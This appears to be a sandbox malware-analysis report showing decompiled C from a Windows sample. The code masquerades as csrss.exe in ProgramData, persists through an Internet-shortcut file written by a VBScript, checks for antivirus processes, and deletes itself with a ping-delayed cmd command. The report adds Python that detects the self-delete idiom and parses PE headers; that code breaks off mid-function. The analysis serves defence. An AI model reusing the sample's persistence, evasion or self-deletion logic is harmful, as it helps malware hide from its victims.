                                                                                                        								E01461A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
                                                                                                        								E01461970( &_v4636,  &_v524);
                                                                                                        								E01461970( &_v4636, L".exe\"");
                                                                                                        								_t100 = E01467AF0( &_v3612,  &_v4636);
                                                                                                        								_t146 = _t146 + 0x20;
                                                                                                        								__eflags = _t100;
                                                                                                        								if(_t100 != 0) {
                                                                                                        									goto L13;
                                                                                                        								} else {
                                                                                                        									goto L12;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t102 = E01467EF0("a2service.exe");
                                                                                                        							_t145 = _t145 + 4;
                                                                                                        							__eflags = _t102;
                                                                                                        							if(_t102 != 0) {
                                                                                                        								goto L10;
                                                                                                        							} else {
                                                                                                        								_t103 = E01467EF0("a2start.exe");
                                                                                                        								_t145 = _t145 + 4;
                                                                                                        								__eflags = _t103;
                                                                                                        								if(_t103 != 0) {
                                                                                                        									goto L10;
                                                                                                        								} else {
                                                                                                        									_t105 = E01467ED0( &_v3612);
                                                                                                        									_t146 = _t145 + 4;
                                                                                                        									__eflags = _t105;
                                                                                                        									if(_t105 != 0) {
                                                                                                        										L13:
                                                                                                        										E01466990( &_v3612);
                                                                                                        										E01461A00( &_v1564,  &_v524);
                                                                                                        										E01461970( &_v1564, L".exe");
                                                                                                        										DeleteFileW( &_v1564);
                                                                                                        										MoveFileW( &_v524,  &_v1564);
                                                                                                        										E014668E0( &_v1564);
                                                                                                        										DeleteFileW( &_v524);
                                                                                                        										return 1;
                                                                                                        									} else {
                                                                                                        										E01461A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
                                                                                                        										E01461970( &_v2588, L"outFile=\"");
                                                                                                        										E01461970( &_v2588,  &_v3612);
                                                                                                        										E01461970( &_v2588, L"\"\r\n");
                                                                                                        										E01461970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
                                                                                                        										E01461970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
                                                                                                        										E01461970( &_v2588,  &_v524);
                                                                                                        										E01461970( &_v2588, L".exe\"\"\"\r\n");
                                                                                                        										E01461970( &_v2588, L"objFile.Close\r\n");
                                                                                                        										_t128 = E01467AF0( &_v1044,  &_v2588);
                                                                                                        										_t150 = _t146 + 0x50;
                                                                                                        										__eflags = _t128;
                                                                                                        										if(__eflags == 0) {
                                                                                                        											L12:
                                                                                                        											__eflags = 0;
                                                                                                        											return 0;
                                                                                                        										} else {
                                                                                                        											E01466A40(0, __eflags,  &_v1044);
                                                                                                        											Sleep(0xbb8);
                                                                                                        											DeleteFileW( &_v1044);
                                                                                                        											_t134 = E01467ED0( &_v3612);
                                                                                                        											_t146 = _t150 + 8;
                                                                                                        											__eflags = _t134;
                                                                                                        											if(_t134 != 0) {
                                                                                                        												goto L13;
                                                                                                        											} else {
                                                                                                        												return _t134;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}
				Instruction addresses (column detached from the decompiled lines above during extraction): 0x014665e5 through 0x01466663, 106 entries, with 0x00000000 marking lines that have no mapped address.

                                                                                                        APIs
                                                                                                          • Part of subcall function 01467FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FAA
                                                                                                          • Part of subcall function 01467FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FBC
                                                                                                          • Part of subcall function 01467FA0: CoTaskMemFree.OLE32(00000000,0146AAE0), ref: 01467FEF
                                                                                                          • Part of subcall function 01467FA0: FreeLibrary.KERNEL32(00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FF6
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 014667D9
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 014667E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
                                                                                                        • String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
                                                                                                        • API String ID: 976351581-227138989
                                                                                                        • Opcode ID: 671f31387eb76ffe7eedd1e7a5d421db0a94a72204410f49f2046076568151df
                                                                                                        • Instruction ID: ad6f6dec5bebba37654f7df4e95756a07402986942676bd2af918ef8c042ffe8
                                                                                                        • Opcode Fuzzy Hash: 671f31387eb76ffe7eedd1e7a5d421db0a94a72204410f49f2046076568151df
                                                                                                        • Instruction Fuzzy Hash: 77615FB2D1021D66CF50E7A2DC45ECB73AC5F6454CF1408ABA509E3021FA75EB98CBA3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E014676A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                        				char _v8;
                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                        				struct _STARTUPINFOW _v92;
                                                                                                        				short _v1116;
                                                                                                        				char _v1636;
                                                                                                        				short _v4196;
                                                                                                        				void* _t53;
                                                                                                        				WCHAR* _t54;
                                                                                                        				WCHAR* _t56;
                                                                                                        				WCHAR* _t58;
                                                                                                        				WCHAR* _t59;
                                                                                                        				WCHAR* _t60;
                                                                                                        				signed int _t62;
                                                                                                        				WCHAR* _t66;
                                                                                                        				WCHAR* _t81;
                                                                                                        				WCHAR* _t82;
                                                                                                        				void* _t87;
                                                                                                        				void* _t88;
                                                                                                        				WCHAR* _t103;
                                                                                                        				WCHAR* _t107;
                                                                                                        				WCHAR* _t110;
                                                                                                        				int _t115;
                                                                                                        				signed int _t120;
                                                                                                        				WCHAR* _t121;
                                                                                                        				WCHAR* _t122;
                                                                                                        				void* _t140;
                                                                                                        				intOrPtr* _t141;
                                                                                                        				WCHAR* _t143;
                                                                                                        				void* _t146;
                                                                                                        				void* _t147;
                                                                                                        				void* _t148;
                                                                                                        				void* _t149;
                                                                                                        				void* _t151;
                                                                                                        				void* _t152;
                                                                                                        				void* _t153;
                                                                                                        				void* _t155;
                                                                                                        
                                                                                                        				_t130 = __ecx;
                                                                                                        				_t148 = _t147 - 0x1060;
                                                                                                        				if( *0x1632e00 >= 0xc350) {
                                                                                                        					L39:
                                                                                                        					__eflags = 0;
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t157 =  *0x1631c4c;
                                                                                                        					if( *0x1631c4c == 0) {
                                                                                                        						goto L39;
                                                                                                        					} else {
                                                                                                        						E01461BB0( &_v92, 0, 0x44);
                                                                                                        						asm("xorps xmm0, xmm0");
                                                                                                        						asm("movups [ebp-0x14], xmm0");
                                                                                                        						_t53 = E01467C30(_t130, __edx, _t157, _a4,  &_v8);
                                                                                                        						_t135 = _t53;
                                                                                                        						_t149 = _t148 + 0x14;
                                                                                                        						if(_t53 != 0) {
                                                                                                        							_t141 = __imp__GetLongPathNameW;
                                                                                                        							_t54 =  *_t141("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200, _t140);
                                                                                                        							__eflags = _t54;
                                                                                                        							if(_t54 == 0) {
                                                                                                        								L37:
                                                                                                        								_push(_v8);
                                                                                                        								goto L38;
                                                                                                        							} else {
                                                                                                        								__eflags = _t54 - 0x200;
                                                                                                        								if(_t54 > 0x200) {
                                                                                                        									goto L37;
                                                                                                        								} else {
                                                                                                        									_t56 = E01461A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\ProgramData\LKBNMTFJgl");
                                                                                                        									_t149 = _t149 + 8;
                                                                                                        									__eflags = _t56;
                                                                                                        									if(_t56 != 0) {
                                                                                                        										L10:
                                                                                                        										_t58 = GetTempPathW(0x200,  &_v1116);
                                                                                                        										__eflags = _t58;
                                                                                                        										if(_t58 == 0) {
                                                                                                        											goto L37;
                                                                                                        										} else {
                                                                                                        											__eflags = _t58 - 0x200;
                                                                                                        											if(_t58 > 0x200) {
                                                                                                        												goto L37;
                                                                                                        											} else {
                                                                                                        												_t59 =  &_v1116;
                                                                                                        												_t60 =  *_t141(_t59, _t59, 0x200);
                                                                                                        												__eflags = _t60;
                                                                                                        												if(_t60 == 0) {
                                                                                                        													goto L37;
                                                                                                        												} else {
                                                                                                        													__eflags = _t60 - 0x200;
                                                                                                        													if(_t60 > 0x200) {
                                                                                                        														goto L37;
                                                                                                        													} else {
                                                                                                        														_t62 = E01461B40( &_v1116);
                                                                                                        														_t151 = _t149 + 4;
                                                                                                        														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
                                                                                                        														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
                                                                                                        															 *((short*)(_t146 + E01461B40( &_v1116) * 2 - 0x458)) = 0x5c;
                                                                                                        															_t120 = E01461B40( &_v1116);
                                                                                                        															_t151 = _t151 + 8;
                                                                                                        															_t130 = 0;
                                                                                                        															__eflags = 0;
                                                                                                        															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
                                                                                                        														}
                                                                                                        														E01461970( &_v1116, "csrss.exe");
                                                                                                        														_t152 = _t151 + 8;
                                                                                                        														goto L17;
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										_t121 = E01461A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", L"ProgramData");
                                                                                                        										_t149 = _t149 + 8;
                                                                                                        										__eflags = _t121;
                                                                                                        										if(_t121 != 0) {
                                                                                                        											goto L10;
                                                                                                        										} else {
                                                                                                        											_t122 = E01461A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x163204c);
                                                                                                        											_t149 = _t149 + 8;
                                                                                                        											__eflags = _t122;
                                                                                                        											if(_t122 != 0) {
                                                                                                        												goto L10;
                                                                                                        											} else {
                                                                                                        												E01461A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        												E01461970( &_v1116, "\\");
                                                                                                        												E01461970( &_v1116, "csrss.exe");
                                                                                                        												_t152 = _t149 + 0x18;
                                                                                                        												E01466D50();
                                                                                                        												L17:
                                                                                                        												_t66 = E014687C0( &_v1116, _v8, _t135);
                                                                                                        												_t149 = _t152 + 0xc;
                                                                                                        												_push(_v8);
                                                                                                        												__eflags = _t66;
                                                                                                        												if(_t66 == 0) {
                                                                                                        													L38:
                                                                                                        													E01461510();
                                                                                                        													 *0x1632e00 =  &(( *0x1632e00)[0]);
                                                                                                        													__eflags =  *0x1632e00;
                                                                                                        													goto L39;
                                                                                                        												} else {
                                                                                                        													E01461510();
                                                                                                        													_t143 = E014615E0(0x24);
                                                                                                        													_t153 = _t149 + 8;
                                                                                                        													__eflags = _t143;
                                                                                                        													if(_t143 != 0) {
                                                                                                        														_t81 = E01468B20( &_v1116, _t143);
                                                                                                        														_t155 = _t153 + 8;
                                                                                                        														__eflags = _t81;
                                                                                                        														if(_t81 != 0) {
                                                                                                        															_t143[0x10] = 0;
                                                                                                        															_t82 = E01461740(_t143, _a16);
                                                                                                        															_t155 = _t155 + 8;
                                                                                                        															_push(_t143);
                                                                                                        															__eflags = _t82;
                                                                                                        															if(_t82 != 0) {
                                                                                                        																goto L21;
                                                                                                        															} else {
                                                                                                        																E01461510();
                                                                                                        																_t153 = _t155 + 4;
                                                                                                        																__eflags =  *0x1631300;
                                                                                                        																if( *0x1631300 == 0) {
                                                                                                        																	L29:
                                                                                                        																	__eflags = _a12;
                                                                                                        																	if(_a12 != 0) {
                                                                                                        																		E01468730(_a8);
                                                                                                        																		_t153 = _t153 + 4;
                                                                                                        																	}
                                                                                                        																	 *0x1632118 = 1;
                                                                                                        																	_t87 =  *0x163211c;
                                                                                                        																	__eflags = _t87;
                                                                                                        																	if(_t87 == 0) {
                                                                                                        																		L33:
                                                                                                        																		_t88 =  *0x1632120;
                                                                                                        																		__eflags = _t88;
                                                                                                        																		if(_t88 != 0) {
                                                                                                        																			TerminateThread(_t88, 0);
                                                                                                        																		}
                                                                                                        																		E01461A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
                                                                                                        																		E01461970( &_v4196, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
                                                                                                        																		E01461970( &_v4196, L"\" & \"");
                                                                                                        																		E01461970( &_v4196,  &_v1116);
                                                                                                        																		E01461970( &_v4196, "\"");
                                                                                                        																		_t153 = _t153 + 0x28;
                                                                                                        																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                        																		__eflags = _t103;
                                                                                                        																		if(_t103 != 0) {
                                                                                                        																			CloseHandle(_v24.hThread);
                                                                                                        																			CloseHandle(_v24);
                                                                                                        																			ExitProcess(0);
                                                                                                        																		}
                                                                                                        																	} else {
                                                                                                        																		_t107 = WaitForSingleObject(_t87, 0xea60);
                                                                                                        																		__eflags = _t107;
                                                                                                        																		if(_t107 == 0) {
                                                                                                        																			goto L33;
                                                                                                        																		}
                                                                                                        																	}
                                                                                                        																} else {
                                                                                                        																	_t143 = E014615E0(0x400);
                                                                                                        																	_t153 = _t153 + 4;
                                                                                                        																	__eflags = _t143;
                                                                                                        																	if(_t143 != 0) {
                                                                                                        																		_t110 = E01467FA0(_t130, _t143, 0x146aad0, 7);
                                                                                                        																		_t155 = _t153 + 0xc;
                                                                                                        																		__eflags = _t110;
                                                                                                        																		if(_t110 == 0) {
                                                                                                        																			goto L20;
                                                                                                        																		} else {
                                                                                                        																			E01461970(_t143, "\\");
                                                                                                        																			E01461970(_t143, "viTRMUuKeV");
                                                                                                        																			E01461970(_t143, L".url");
                                                                                                        																			_t155 = _t155 + 0x18;
                                                                                                        																			E01466D70();
                                                                                                        																			_t115 = DeleteFileW(_t143);
                                                                                                        																			_push(_t143);
                                                                                                        																			__eflags = _t115;
                                                                                                        																			if(_t115 == 0) {
                                                                                                        																				goto L21;
                                                                                                        																			} else {
                                                                                                        																				E01461510();
                                                                                                        																				_t153 = _t155 + 4;
                                                                                                        																				goto L29;
                                                                                                        																			}
                                                                                                        																		}
                                                                                                        																	}
                                                                                                        																}
                                                                                                        															}
                                                                                                        														} else {
                                                                                                        															L20:
                                                                                                        															_push(_t143);
                                                                                                        															L21:
                                                                                                        															E01461510();
                                                                                                        															_t153 = _t155 + 4;
                                                                                                        														}
                                                                                                        													}
                                                                                                        													DeleteFileW( &_v1116);
                                                                                                        													 *0x1632e00 =  &(( *0x1632e00)[0]);
                                                                                                        													E01461A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        													E01461970( &_v1636, "\\");
                                                                                                        													E01461970( &_v1636, "csrss.exe");
                                                                                                        													E01466340( &_v1636);
                                                                                                        													__eflags = 0;
                                                                                                        													return 0;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							 *0x1632e00 =  &(( *0x1632e00)[0]);
                                                                                                        							return _t53;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
Instruction addresses of the decompiled function above, as listed in the report's address column (the column is cut off here; 0x00000000 marks lines without an address): 0x014676a0, 0x014676a8, 0x014676b5, 0x01467a92, 0x01467a92, 0x01467a97, 0x014676bb, 0x014676bb, 0x014676c3, 0x00000000, 0x014676c9, 0x014676d2, 0x014676da, 0x014676e1, 0x014676e5, 0x014676ea, 0x014676ec, 0x014676f1, 0x01467700, 0x01467715, 0x01467717, 0x01467719, 0x01467a7e, 0x01467a7e, 0x00000000, 0x0146771f, 0x0146771f, 0x01467724, 0x00000000, 0x0146772a, 0x01467734, 0x01467739, 0x0146773c, 0x0146773e, 0x014677ac, 0x014677b8
                                                                                                        0x014677be
                                                                                                        0x014677c0
                                                                                                        0x00000000
                                                                                                        0x014677c6
                                                                                                        0x014677c6
                                                                                                        0x014677cb
                                                                                                        0x00000000
                                                                                                        0x014677d1
                                                                                                        0x014677d6
                                                                                                        0x014677de
                                                                                                        0x014677e0
                                                                                                        0x014677e2
                                                                                                        0x00000000
                                                                                                        0x014677e8
                                                                                                        0x014677e8
                                                                                                        0x014677ed
                                                                                                        0x00000000
                                                                                                        0x014677f3
                                                                                                        0x014677fa
                                                                                                        0x014677ff
                                                                                                        0x01467802
                                                                                                        0x0146780b
                                                                                                        0x0146781e
                                                                                                        0x0146782d
                                                                                                        0x01467832
                                                                                                        0x01467835
                                                                                                        0x01467835
                                                                                                        0x01467837
                                                                                                        0x01467837
                                                                                                        0x0146784b
                                                                                                        0x01467850
                                                                                                        0x00000000
                                                                                                        0x01467850
                                                                                                        0x014677ed
                                                                                                        0x014677e2
                                                                                                        0x014677cb
                                                                                                        0x01467740
                                                                                                        0x0146774a
                                                                                                        0x0146774f
                                                                                                        0x01467752
                                                                                                        0x01467754
                                                                                                        0x00000000
                                                                                                        0x01467756
                                                                                                        0x01467760
                                                                                                        0x01467765
                                                                                                        0x01467768
                                                                                                        0x0146776a
                                                                                                        0x00000000
                                                                                                        0x0146776c
                                                                                                        0x01467778
                                                                                                        0x01467789
                                                                                                        0x0146779a
                                                                                                        0x0146779f
                                                                                                        0x014677a2
                                                                                                        0x01467853
                                                                                                        0x0146785e
                                                                                                        0x01467863
                                                                                                        0x01467866
                                                                                                        0x01467869
                                                                                                        0x0146786b
                                                                                                        0x01467a81
                                                                                                        0x01467a81
                                                                                                        0x01467a89
                                                                                                        0x01467a89
                                                                                                        0x00000000
                                                                                                        0x01467871
                                                                                                        0x01467871
                                                                                                        0x01467883
                                                                                                        0x01467885
                                                                                                        0x01467888
                                                                                                        0x0146788a
                                                                                                        0x01467894
                                                                                                        0x01467899
                                                                                                        0x0146789c
                                                                                                        0x0146789e
                                                                                                        0x01467906
                                                                                                        0x0146790b
                                                                                                        0x01467910
                                                                                                        0x01467913
                                                                                                        0x01467914
                                                                                                        0x01467916
                                                                                                        0x00000000
                                                                                                        0x01467918
                                                                                                        0x01467918
                                                                                                        0x0146791d
                                                                                                        0x01467920
                                                                                                        0x01467927
                                                                                                        0x01467995
                                                                                                        0x01467995
                                                                                                        0x01467999
                                                                                                        0x0146799e
                                                                                                        0x014679a3
                                                                                                        0x014679a3
                                                                                                        0x014679ad
                                                                                                        0x014679af
                                                                                                        0x014679b4
                                                                                                        0x014679b6
                                                                                                        0x014679cc
                                                                                                        0x014679cc
                                                                                                        0x014679d1
                                                                                                        0x014679d3
                                                                                                        0x014679d8
                                                                                                        0x014679d8
                                                                                                        0x014679ea
                                                                                                        0x014679fb
                                                                                                        0x01467a0c
                                                                                                        0x01467a1f
                                                                                                        0x01467a30
                                                                                                        0x01467a35
                                                                                                        0x01467a58
                                                                                                        0x01467a5e
                                                                                                        0x01467a60
                                                                                                        0x01467a6f
                                                                                                        0x01467a74
                                                                                                        0x01467a78
                                                                                                        0x01467a78
                                                                                                        0x014679b8
                                                                                                        0x014679be
                                                                                                        0x014679c4
                                                                                                        0x014679c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014679c6
                                                                                                        0x01467929
                                                                                                        0x01467933
                                                                                                        0x01467935
                                                                                                        0x01467938
                                                                                                        0x0146793a
                                                                                                        0x01467948
                                                                                                        0x0146794d
                                                                                                        0x01467950
                                                                                                        0x01467952
                                                                                                        0x00000000
                                                                                                        0x01467958
                                                                                                        0x0146795e
                                                                                                        0x01467969
                                                                                                        0x01467974
                                                                                                        0x01467979
                                                                                                        0x0146797c
                                                                                                        0x01467982
                                                                                                        0x01467984
                                                                                                        0x01467985
                                                                                                        0x01467987
                                                                                                        0x00000000
                                                                                                        0x0146798d
                                                                                                        0x0146798d
                                                                                                        0x01467992
                                                                                                        0x00000000
                                                                                                        0x01467992
                                                                                                        0x01467987
                                                                                                        0x01467952
                                                                                                        0x0146793a
                                                                                                        0x01467927
                                                                                                        0x014678a0
                                                                                                        0x014678a0
                                                                                                        0x014678a0
                                                                                                        0x014678a1
                                                                                                        0x014678a1
                                                                                                        0x014678a6
                                                                                                        0x014678a6
                                                                                                        0x0146789e
                                                                                                        0x014678b0
                                                                                                        0x014678b2
                                                                                                        0x014678c5
                                                                                                        0x014678d6
                                                                                                        0x014678e7
                                                                                                        0x014678f3
                                                                                                        0x014678fb
                                                                                                        0x01467902
                                                                                                        0x01467902
                                                                                                        0x0146786b
                                                                                                        0x0146776a
                                                                                                        0x01467754
                                                                                                        0x0146773e
                                                                                                        0x01467724
                                                                                                        0x014676f3
                                                                                                        0x014676f3
                                                                                                        0x014676fe
                                                                                                        0x014676fe
                                                                                                        0x014676f1
                                                                                                        0x014676c3

APIs
• Part of subcall function 01467C30: InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 01467C87
• GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200,?,?,?,?,?,?), ref: 01467715
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014678B0
Memory Dump Source
• Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
Similarity
• API ID: CrackDeleteFileInternetLongNamePath
• String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$ProgramData$\$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV
• API String ID: 3724707802-805812302
• Opcode ID: c4d2c6ce46f585a3dd3308ae4562a4ad25ca0f4c42f9eaea2c7b7543b9ddf4c6
• Instruction ID: e397efedccce0264f7966f67d68d72eaaa3801d52d864ae1006c483f3e833279
• Opcode Fuzzy Hash: c4d2c6ce46f585a3dd3308ae4562a4ad25ca0f4c42f9eaea2c7b7543b9ddf4c6
• Instruction Fuzzy Hash: 709109B1D0020966EB20A7E6DC05FDF776C9F60A4EF04006FEA05E3171FA75A654C6A3
Uniqueness Score: -1.00%
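The strings listed for this function, the string `cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "` together with the sample's own path (resolved through the GetLongPathNameW call above), assemble the usual delayed self-deletion command: ping is used purely as a sleep, so that Del runs once the parent has exited and its image is no longer locked. The Python below is an added detection example, not code from the report or from the sample. It runs over constructed (ParentImage, CommandLine) pairs of the kind a process-creation log provides; only the first pair is rebuilt from the page's strings, the rest are invented benign and near-miss cases. It flags the idiom and separates the true self-delete (target equals the parent's own image) from a delayed delete of some other file.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Matches the delayed self-deletion idiom assembled from this function's strings:
#   cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "<path>"
# ping only burns time here; the Del runs after the parent process has exited.
SELF_DELETE_RE = re.compile(
    r"""cmd(?:\.exe)?\s+/c\s+                 # cmd.exe /C
        ping\s+(?P<ping_args>.+?)\s*          # ping <host> [-n N] [-w ms]
        >\s*nul\s*&\s*                        # > Nul &
        (?:del|erase)\s+(?:/[a-z]\s+)*        # Del /f /q
        "?(?P<target>[^"]+?)"?\s*$            # file being deleted
    """,
    re.IGNORECASE | re.VERBOSE,
)
PING_OPT_RE = re.compile(r"-(?P<opt>[nw])\s+(?P<val>\d+)", re.IGNORECASE)


@dataclass(frozen=True)
class SelfDeleteHit:
    host: str          # host pinged purely as a delay
    count: int         # -n value (Windows default is 4)
    wait_ms: int       # -w per-reply timeout (Windows default is 4000)
    target: str        # path handed to Del
    self_delete: bool  # True when target is the parent process's own image


def _norm(path: str) -> str:
    """Case-insensitive, slash-normalised comparison key for Windows paths."""
    return path.strip().strip('"').replace("/", "\\").lower()


def detect_self_delete(parent_image: str, cmdline: str) -> Optional[SelfDeleteHit]:
    """Return a hit when cmdline is a ping-delayed delete; None otherwise."""
    m = SELF_DELETE_RE.search(cmdline)
    if m is None:
        return None
    ping_args = m.group("ping_args")
    # The host is the first token that is neither an option nor an option value.
    host = next((tok for tok in ping_args.split()
                 if not tok.startswith("-") and not tok.isdigit()), "")
    opts = {k.lower(): int(v) for k, v in PING_OPT_RE.findall(ping_args)}
    target = m.group("target")
    return SelfDeleteHit(
        host=host,
        count=opts.get("n", 4),
        wait_ms=opts.get("w", 4000),
        target=target,
        self_delete=_norm(target) == _norm(parent_image),
    )


def scan(events: List[Tuple[str, str]]) -> List[SelfDeleteHit]:
    """events: (ParentImage, CommandLine) pairs as a process-creation log would give."""
    hits = []
    for parent_image, cmdline in events:
        hit = detect_self_delete(parent_image, cmdline)
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed sample events (not taken from the report's log). Only the first
# is rebuilt from the strings listed for this function; the others are made up.
SAMPLE_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe",
     r'cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe"'),
    (r"C:\Windows\explorer.exe", r"ping 8.8.8.8 -n 4"),
    (r"C:\Windows\explorer.exe", r'cmd.exe /C del /q "C:\Users\user\Downloads\old.log"'),
    (r"C:\Users\user\Downloads\setup.exe",
     r'C:\Windows\system32\cmd.exe /c ping localhost -n 3 > nul & del "C:\Temp\installer.tmp"'),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The fourth sample event shows why the parent image matters: an installer deleting its own temporary file with the same trick is common and benign, whereas a process deleting its own executable is almost always a dropper covering its tracks, so alert on `self_delete` and only log the rest.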
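The decompiled routine E01465B80 that follows locates the NT headers of an embedded image the way any loader does: 'MZ' at the base (0x146c038), e_lfanew read at base + 0x3c (0x146c074), 'PE\0\0' at base + e_lfanew, with no check that e_lfanew stays inside the buffer. The Python below is an added example, not the sample's or the report's code: it performs the same walk on a constructed minimal PE blob, adds the bounds checks the routine omits, and reads the fields a process-hollowing loader needs next (AddressOfEntryPoint, ImageBase, SizeOfImage). It also handles PE32+ headers, which goes beyond the 32-bit case on the page.

```python
import struct
from dataclasses import dataclass

IMAGE_DOS_SIGNATURE = 0x5A4D   # "MZ", the value the routine compares against 0x5a4d
IMAGE_NT_SIGNATURE = 0x4550    # "PE\0\0", compared against 0x4550
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
E_LFANEW_OFFSET = 0x3C         # 0x146c074 - 0x146c038 in the decompiled code
# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
FILE_HEADER_FMT = "<HHIIIHH"


@dataclass(frozen=True)
class NtHeaderInfo:
    e_lfanew: int
    machine: int
    number_of_sections: int
    is_pe32plus: bool
    entry_point_rva: int
    image_base: int
    size_of_image: int


def locate_nt_headers(blob: bytes) -> NtHeaderInfo:
    """Walk MZ -> e_lfanew -> PE signature like the decompiled routine, but bounds-checked."""
    if len(blob) < E_LFANEW_OFFSET + 4:
        raise ValueError("buffer too small for IMAGE_DOS_HEADER")
    (e_magic,) = struct.unpack_from("<H", blob, 0)
    if e_magic != IMAGE_DOS_SIGNATURE:
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", blob, E_LFANEW_OFFSET)
    file_hdr_len = struct.calcsize(FILE_HEADER_FMT)
    # The routine adds e_lfanew to the base unchecked; a corrupt value reads out of bounds.
    if e_lfanew + 4 + file_hdr_len > len(blob):
        raise ValueError("e_lfanew points outside the buffer")
    (signature,) = struct.unpack_from("<I", blob, e_lfanew)
    if signature != IMAGE_NT_SIGNATURE:
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from(FILE_HEADER_FMT, blob, e_lfanew + 4)
    opt = e_lfanew + 4 + file_hdr_len
    if opt_size < 64 or opt + opt_size > len(blob):
        raise ValueError("optional header truncated")
    (magic,) = struct.unpack_from("<H", blob, opt)
    (entry,) = struct.unpack_from("<I", blob, opt + 16)          # AddressOfEntryPoint, same offset in both formats
    (size_of_image,) = struct.unpack_from("<I", blob, opt + 56)  # SizeOfImage, same offset in both formats
    if magic == PE32_MAGIC:
        (image_base,) = struct.unpack_from("<I", blob, opt + 28)
    elif magic == PE32PLUS_MAGIC:
        (image_base,) = struct.unpack_from("<Q", blob, opt + 24)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    return NtHeaderInfo(e_lfanew, machine, nsections, magic == PE32PLUS_MAGIC,
                        entry, image_base, size_of_image)


def build_minimal_pe(pe32plus: bool = False, entry_rva: int = 0x1000,
                     image_base: int = 0x00400000, size_of_image: int = 0x3000,
                     e_lfanew: int = 0x80) -> bytes:
    """Constructed test image: DOS header, stub padding, PE signature, file header,
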